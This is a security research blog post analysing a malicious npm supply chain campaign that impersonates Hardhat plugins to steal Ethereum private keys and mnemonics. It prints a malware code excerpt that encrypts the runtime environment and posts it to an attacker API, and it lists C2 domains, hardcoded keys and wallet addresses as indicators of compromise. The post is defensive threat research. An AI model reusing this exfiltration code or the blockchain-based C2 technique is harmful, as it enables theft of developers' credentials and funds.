Security News
Research
Socket Research Team
January 2, 2025
Hardhat, maintained by the Nomic Foundation, is a vital tool for Ethereum developers. As a versatile development environment for Ethereum, it streamlines the creation, testing, and deployment of smart contracts and dApps. Its flexible plugin architecture allows developers to customize workflows with tools and extensions, optimizing productivity and supporting the entire Ethereum development lifecycle.
A supply chain attack is currently targeting the Nomic Foundation and Hardhat platforms, two integral components of the Ethereum development ecosystem. By exploiting trust in open source plugins, attackers have infiltrated these platforms through malicious npm packages, exfiltrating critical data such as private keys, mnemonics, and configuration details.
This ongoing attack targets the Nomic Foundation, Hardhat, and associated plugins via malicious npm packages that impersonate legitimate plugins. The attack has led to the identification of 20 malicious packages published by three primary authors, with the most downloaded package, @nomicsfoundation/sdk-test, accumulating 1,092 downloads. The impact includes compromised development environments, potential backdoors in production systems, and loss of funds.
Analyzing the Ethereum addresses associated with the recent discovery of malicious npm package campaigns reveals several key findings:
Attackers have employed Ethereum smart contracts to dynamically retrieve C2 server addresses. This method leverages the decentralized and immutable nature of the blockchain, making it challenging to disrupt the C2 infrastructure. For instance, the smart contract at address 0xa1b40044EBc2794f207D45143Bd82a1B86156c6b has been utilized to store and provide C2 addresses to infected systems.
Specific Ethereum wallet addresses have been identified in connection with these campaigns. Notably, the wallet 0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84 has been associated with the aforementioned smart contract, serving as a parameter to retrieve C2 server information.
Attackers have employed impersonation as their primary strategy, mimicking the names of legitimate packages and organizations to embed themselves within the supply chain. Examples include packages such as @nomisfoundation/hardhat-configure and @monicfoundation/hardhat-config, designed to appear as genuine Hardhat plugins but containing malicious code.
@nomiclabs/hardhat-ethers; Malicious Package: @nomisfoundation/hardhat-configure.hardhat-deploy; Malicious Package: hardhat-deploy-others.hreInit() or hreConfig() to exfiltrate sensitive data, while legitimate plugins use the Hardhat Runtime Environment (HRE) for valid tasks like contract deployment or testing.The attack flow follows a structured path:
var info;
if (hre?.MNEMONIC?.length > 0 || hre?.PRIVATE_KEY?.length > 0) {
info = JSON.stringify(hre);
}var encodedInfo = aesEncrypt(info, AES_KEY);axios.post(API_URL + "/projects/setData", {
project: "hardhat",
info: encodedInfo,
state: 'okay'
});The attack begins when compromised packages are installed. These packages exploit the Hardhat runtime environment using functions such as hreInit() and hreConfig() to collect sensitive details like private keys, mnemonics, and configuration files. The collected data is transmitted to attacker-controlled endpoints, leveraging hardcoded keys and Ethereum addresses for streamlined exfiltration.
This attack compromises sensitive data, including private keys and mnemonics, undermining trust in open source ecosystems. Additionally, it risks deploying malicious contracts to the Ethereum mainnet, further escalating the potential damage.
This attack highlights just one malicious campaign within the open source ecosystem and the critical need for vigilance in package selection. Developers and organizations must implement stricter auditing and monitoring practices to safeguard their development environments. Install the free Socket for GitHub app to avoid accidentally installing one of these malicious packages. Socket's AI-powered threat detection catches these types of attacks, and 70+ other indicators of supply chain risk, before they land in your development environment.
lightfury0000000:nomicsfoundations@nomisfoundation/hardhat-configureinstalledpackagepublish@nomisfoundation/hardhat-config@monicfoundation/hardhat-confignomicsfoundation:@nomicsfoundation/sdk-test@nomicsfoundation/hardhat-config@nomicsfoundation/web3-sdk@nomicsfoundation/sdk-test1brightstar1001:hxxps://projects[.]metabest[.]tech/apihxxps://cryptoshiny[.]com/apihxxps://cryptoshiny[.]com/api/projects/setDatahxxps://cryptoshiny[.]com/api/projects/getAddresshxxps://projects[.]cryptosnowprince[.]com/apihxxp://t0uxistfm4fo6bg9pjfpdqb1ssyjmfa4[.]oastify[.]comhxxps://pastebin[.]com/api/api_post[.]php8GAq/DfzWy74ESgzmSYPXMSghwPjOY3oa7HZ6u+FSCs=:PMnracLLHhsVjTj+dwHOQQ==zCviLVtg0oHC2aT_xQ_7VU96pzxM35jud8186f40984375851b912c75b5bd24e70xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc20xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c0xae13d989daC2f0dEbFf460aC112a837C89BAa7cd0xE0B7927c4aF23765Cb51314A0E0521A9645F0E2A0x0d500B1d8E8eF31E21C99d1Db9A6444d3ADf1270Dhanesh Dodia
Sambarathi Sai
Dwijay Chintakunta
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Security News
Fluent Assertions is facing backlash after dropping the Apache license for a commercial model, leaving users blindsided and questioning contributor rights.
Research
Security News
Socket researchers uncover the risks of a malicious Python package targeting Discord developers.
Security News
The UK is proposing a bold ban on ransomware payments by public entities to disrupt cybercrime, protect critical services, and lead global cybersecurity efforts.